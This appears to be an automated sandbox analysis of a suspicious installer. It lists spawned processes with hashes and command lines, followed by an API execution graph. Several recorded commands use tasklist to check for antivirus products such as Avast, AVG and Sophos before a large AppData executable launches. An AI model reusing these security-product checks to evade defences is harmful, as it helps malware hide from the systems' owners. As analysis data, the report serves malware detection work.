Imagebase:0x340000
File size:8'767'044 bytes
MD5 hash:51F99EDDD33CC04FB0F55F873B76D907
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Has exited:true

Target ID:22
Start time:06:17:04
Start date:06/01/2025
Path:C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmp
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmp" /SL5="$70296,7785838,845824,C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe" /VERYSILENT
Imagebase:0xa60000
File size:3'367'424 bytes
MD5 hash:F809F51E678B7F2E388F8C969EF902C8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Antivirus matches:
• Detection: 0%, ReversingLabs
Has exited:true

Target ID:23
Start time:06:17:32
Start date:06/01/2025
Path:C:\Windows\System32\timeout.exe
Wow64 process (32bit):false
Commandline:"timeout" 9
Imagebase:0x7ff6a5670000
File size:32'768 bytes
MD5 hash:100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:24
Start time:06:17:32
Start date:06/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:25
Start time:06:17:41
Start date:06/01/2025
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
Imagebase:0x7ff7c08d0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:26
Start time:06:17:41
Start date:06/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:27
Start time:06:17:41
Start date:06/01/2025
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Imagebase:0x7ff705310000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:28
Start time:06:17:41
Start date:06/01/2025
Path:C:\Windows\System32\find.exe
Wow64 process (32bit):false
Commandline:find /I "wrsa.exe"
Imagebase:0x7ff775fd0000
File size:17'920 bytes
MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:29
Start time:06:17:41
Start date:06/01/2025
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
Imagebase:0x7ff7c08d0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:30
Start time:06:17:41
Start date:06/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:31
Start time:06:17:41
Start date:06/01/2025
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Imagebase:0x7ff705310000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:32
Start time:06:17:41
Start date:06/01/2025
Path:C:\Windows\System32\find.exe
Wow64 process (32bit):false
Commandline:find /I "opssvc.exe"
Imagebase:0x7ff775fd0000
File size:17'920 bytes
MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:33
Start time:06:17:41
Start date:06/01/2025
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
Imagebase:0x7ff7c08d0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:34
Start time:06:17:41
Start date:06/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:35
Start time:06:17:41
Start date:06/01/2025
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
Imagebase:0x7ff705310000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:36
Start time:06:17:41
Start date:06/01/2025
Path:C:\Windows\System32\find.exe
Wow64 process (32bit):false
Commandline:find /I "avastui.exe"
Imagebase:0x7ff775fd0000
File size:17'920 bytes
MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:37
Start time:06:17:42
Start date:06/01/2025
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
Imagebase:0x7ff7c08d0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:38
                                                                                                                                                                                                                                                              Start time:06:17:42
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:39
                                                                                                                                                                                                                                                              Start time:06:17:42
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
                                                                                                                                                                                                                                                              Imagebase:0x7ff705310000
                                                                                                                                                                                                                                                              File size:106'496 bytes
                                                                                                                                                                                                                                                              MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:40
                                                                                                                                                                                                                                                              Start time:06:17:42
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:find /I "avgui.exe"
                                                                                                                                                                                                                                                              Imagebase:0x7ff775fd0000
                                                                                                                                                                                                                                                              File size:17'920 bytes
                                                                                                                                                                                                                                                              MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:41
                                                                                                                                                                                                                                                              Start time:06:17:42
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
                                                                                                                                                                                                                                                              Imagebase:0x7ff7c08d0000
                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:42
                                                                                                                                                                                                                                                              Start time:06:17:42
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:43
                                                                                                                                                                                                                                                              Start time:06:17:42
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
                                                                                                                                                                                                                                                              Imagebase:0x7ff705310000
                                                                                                                                                                                                                                                              File size:106'496 bytes
                                                                                                                                                                                                                                                              MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:44
                                                                                                                                                                                                                                                              Start time:06:17:42
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:find /I "nswscsvc.exe"
                                                                                                                                                                                                                                                              Imagebase:0x7ff775fd0000
                                                                                                                                                                                                                                                              File size:17'920 bytes
                                                                                                                                                                                                                                                              MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:45
                                                                                                                                                                                                                                                              Start time:06:17:42
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
                                                                                                                                                                                                                                                              Imagebase:0x7ff7c08d0000
                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:46
                                                                                                                                                                                                                                                              Start time:06:17:42
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:47
                                                                                                                                                                                                                                                              Start time:06:17:42
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
                                                                                                                                                                                                                                                              Imagebase:0x7ff705310000
                                                                                                                                                                                                                                                              File size:106'496 bytes
                                                                                                                                                                                                                                                              MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:48
                                                                                                                                                                                                                                                              Start time:06:17:42
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:find /I "sophoshealth.exe"
                                                                                                                                                                                                                                                              Imagebase:0x7ff775fd0000
                                                                                                                                                                                                                                                              File size:17'920 bytes
                                                                                                                                                                                                                                                              MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:49
                                                                                                                                                                                                                                                              Start time:06:17:46
                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                              File size:846'325'235 bytes
                                                                                                                                                                                                                                                              MD5 hash:6A8860A8150021B2D5B9BB707DE4FA37
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                Execution Coverage:18.6%
                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                Signature Coverage:20.7%
                                                                                                                                                                                                                                                                Total number of Nodes:1525
                                                                                                                                                                                                                                                                Total number of Limit Nodes:34
4829->4830 4829->4833 4831 402350 VerQueryValueW 4830->4831 4832 402381 GlobalFree 4830->4832 4831->4832 4835 402369 4831->4835 4832->4833 4839 405f51 wsprintfW 4835->4839 4837 402375 4840 405f51 wsprintfW 4837->4840 4839->4837 4840->4832 4841 402afd 4842 40145c 18 API calls 4841->4842 4843 402b04 4842->4843 4848 405e50 GetFileAttributesW CreateFileW 4843->4848 4845 402b10 4846 4030e3 4845->4846 4849 405f51 wsprintfW 4845->4849 4848->4845 4849->4846 4850 4029ff 4851 401553 19 API calls 4850->4851 4852 402a09 4851->4852 4853 40145c 18 API calls 4852->4853 4854 402a12 4853->4854 4855 402a1f RegQueryValueExW 4854->4855 4857 401a13 4854->4857 4856 402a3f 4855->4856 4860 402a45 4855->4860 4856->4860 4861 405f51 wsprintfW 4856->4861 4859 4029e4 RegCloseKey 4859->4857 4860->4857 4860->4859 4861->4860 4862 401000 4863 401037 BeginPaint GetClientRect 4862->4863 4864 40100c DefWindowProcW 4862->4864 4866 4010fc 4863->4866 4867 401182 4864->4867 4868 401073 CreateBrushIndirect FillRect DeleteObject 4866->4868 4869 401105 4866->4869 4868->4866 4870 401170 EndPaint 4869->4870 4871 40110b CreateFontIndirectW 4869->4871 4870->4867 4871->4870 4872 40111b 6 API calls 4871->4872 4872->4870 4873 401f80 4874 401446 18 API calls 4873->4874 4875 401f88 4874->4875 4876 401446 18 API calls 4875->4876 4877 401f93 4876->4877 4878 401fa3 4877->4878 4879 40145c 18 API calls 4877->4879 4880 401fb3 4878->4880 4881 40145c 18 API calls 4878->4881 4879->4878 4882 402006 4880->4882 4883 401fbc 4880->4883 4881->4880 4885 40145c 18 API calls 4882->4885 4884 401446 18 API calls 4883->4884 4887 401fc4 4884->4887 4886 40200d 4885->4886 4888 40145c 18 API calls 4886->4888 4889 401446 18 API calls 4887->4889 4890 402016 FindWindowExW 4888->4890 4891 401fce 4889->4891 4895 402036 4890->4895 4892 401ff6 SendMessageW 4891->4892 4893 401fd8 SendMessageTimeoutW 4891->4893 4892->4895 4893->4895 4894 4030e3 4895->4894 4897 405f51 wsprintfW 4895->4897 4897->4894 4898 402880 4899 402884 4898->4899 4900 40145c 18 
API calls 4899->4900 4901 4028a7 4900->4901 4902 40145c 18 API calls 4901->4902 4903 4028b1 4902->4903 4904 4028ba RegCreateKeyExW 4903->4904 4905 4028e8 4904->4905 4912 4029ef 4904->4912 4906 402934 4905->4906 4907 40145c 18 API calls 4905->4907 4908 402963 4906->4908 4911 401446 18 API calls 4906->4911 4910 4028fc lstrlenW 4907->4910 4909 4029ae RegSetValueExW 4908->4909 4913 40337f 37 API calls 4908->4913 4916 4029c6 RegCloseKey 4909->4916 4917 4029cb 4909->4917 4914 402918 4910->4914 4915 40292a 4910->4915 4918 402947 4911->4918 4919 40297b 4913->4919 4920 4062a3 11 API calls 4914->4920 4921 4062a3 11 API calls 4915->4921 4916->4912 4922 4062a3 11 API calls 4917->4922 4923 4062a3 11 API calls 4918->4923 4929 406224 4919->4929 4925 402922 4920->4925 4921->4906 4922->4916 4923->4908 4925->4909 4928 4062a3 11 API calls 4928->4925 4930 406247 4929->4930 4931 40628a 4930->4931 4932 40625c wsprintfW 4930->4932 4933 402991 4931->4933 4934 406293 lstrcatW 4931->4934 4932->4931 4932->4932 4933->4928 4934->4933 4935 402082 4936 401446 18 API calls 4935->4936 4937 402093 SetWindowLongW 4936->4937 4938 4030e3 4937->4938 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3639 403859 3483->3639 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3490 403ac1 3667 4060e7 3490->3667 3491 403ae1 3646 405ca0 3491->3646 3492 403bce 3495 403c51 
3492->3495 3497 4062fc 3 API calls 3492->3497 3650 406009 lstrcpynW 3493->3650 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3651 40677e 3503->3651 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3681 406009 lstrcpynW 3509->3681 3680 406009 lstrcpynW 3510->3680 3515 403bef 3511->3515 3514 403b44 3682 406009 lstrcpynW 3514->3682 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3666 406009 lstrcpynW 3519->3666 3709 40141d 3520->3709 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3683 406805 3529->3683 3701 406c68 3529->3701 3706 405c3f CreateProcessW 3529->3706 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3712 406038 3546->3712 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3721 406722 lstrlenW CharPrevW 3549->3721 3728 405e50 GetFileAttributesW CreateFileW 3554->3728 3556 4035c7 3577 4035d7 3556->3577 3729 406009 lstrcpynW 3556->3729 3558 4035ed 3730 406751 lstrlenW 3558->3730 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3737 4032d2 3563->3737 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3771 403368 SetFilePointer 3565->3771 3748 403368 SetFilePointer 3567->3748 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3749 40337f 3571->3749 3572 403720 3575 403336 ReadFile 3572->3575 
3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3735 403336 ReadFile 3576->3735 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3812 405f51 wsprintfW 3585->3812 3813 405ed3 RegOpenKeyExW 3586->3813 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3795 403e95 3592->3795 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3819 403e74 3602->3819 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3636 405b70 3605->3636 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3616 406722 3 API calls 3608->3616 3609->3608 3614 405a4d GetFileAttributesW 3609->3614 3611->3606 3617 405b6c 3612->3617 3618 405a2a 3613->3618 3619 405a59 3614->3619 3615 405a9c 3615->3604 3620 405a69 3616->3620 3623 403e95 19 API calls 3617->3623 3617->3636 3618->3607 3619->3608 3621 406751 2 API calls 3619->3621 3818 406009 lstrcpynW 3620->3818 3621->3608 3624 405b7d 3623->3624 3625 405b89 ShowWindow LoadLibraryW 3624->3625 3626 405c0c 3624->3626 3628 405ba8 LoadLibraryW 3625->3628 3629 405baf GetClassInfoW 3625->3629 3804 405047 OleInitialize 3626->3804 3628->3629 3630 405bc3 GetClassInfoW RegisterClassW 3629->3630 3631 405bd9 DialogBoxParamW 3629->3631 3630->3631 3633 40141d 80 API calls 3631->3633 3632 405c12 3634 405c16 3632->3634 3635 405c2e 3632->3635 3633->3636 3634->3636 3638 40141d 80 API calls 3634->3638 3637 
40141d 80 API calls 3635->3637 3636->3490 3637->3636 3638->3636 3640 403871 3639->3640 3641 403863 CloseHandle 3639->3641 3964 403c83 3640->3964 3641->3640 3647 405cb5 3646->3647 3648 403aef ExitProcess 3647->3648 3649 405ccb MessageBoxIndirectW 3647->3649 3649->3648 3650->3473 4021 406009 lstrcpynW 3651->4021 3653 40678f 3654 405d59 4 API calls 3653->3654 3655 406795 3654->3655 3656 406038 5 API calls 3655->3656 3663 403a97 3655->3663 3662 4067a5 3656->3662 3657 4067dd lstrlenW 3658 4067e4 3657->3658 3657->3662 3659 406722 3 API calls 3658->3659 3661 4067ea GetFileAttributesW 3659->3661 3660 4062d5 2 API calls 3660->3662 3661->3663 3662->3657 3662->3660 3662->3663 3664 406751 2 API calls 3662->3664 3663->3483 3665 406009 lstrcpynW 3663->3665 3664->3657 3665->3519 3666->3486 3668 406110 3667->3668 3669 4060f3 3667->3669 3671 406187 3668->3671 3672 40612d 3668->3672 3675 406104 3668->3675 3670 4060fd CloseHandle 3669->3670 3669->3675 3670->3675 3673 406190 lstrcatW lstrlenW WriteFile 3671->3673 3671->3675 3672->3673 3674 406136 GetFileAttributesW 3672->3674 3673->3675 4022 405e50 GetFileAttributesW CreateFileW 3674->4022 3675->3483 3677 406152 3677->3675 3678 406162 WriteFile 3677->3678 3679 40617c SetFilePointer 3677->3679 3678->3679 3679->3671 3680->3509 3681->3514 3682->3529 3698 406812 3683->3698 3684 406a7f 3685 403b6c DeleteFileW 3684->3685 4025 406009 lstrcpynW 3684->4025 3685->3527 3685->3529 3687 4068d3 GetVersion 3687->3698 3688 406a46 lstrlenW 3688->3698 3689 406805 10 API calls 3689->3688 3692 405ed3 3 API calls 3692->3698 3693 406952 GetSystemDirectoryW 3693->3698 3694 406965 GetWindowsDirectoryW 3694->3698 3695 406038 5 API calls 3695->3698 3696 406805 10 API calls 3696->3698 3697 4069df lstrcatW 3697->3698 3698->3684 3698->3687 3698->3688 3698->3689 3698->3692 3698->3693 3698->3694 3698->3695 3698->3696 3698->3697 3699 406999 SHGetSpecialFolderLocation 3698->3699 4023 405f51 wsprintfW 3698->4023 4024 406009 lstrcpynW 3698->4024 3699->3698 3700 4069b1 
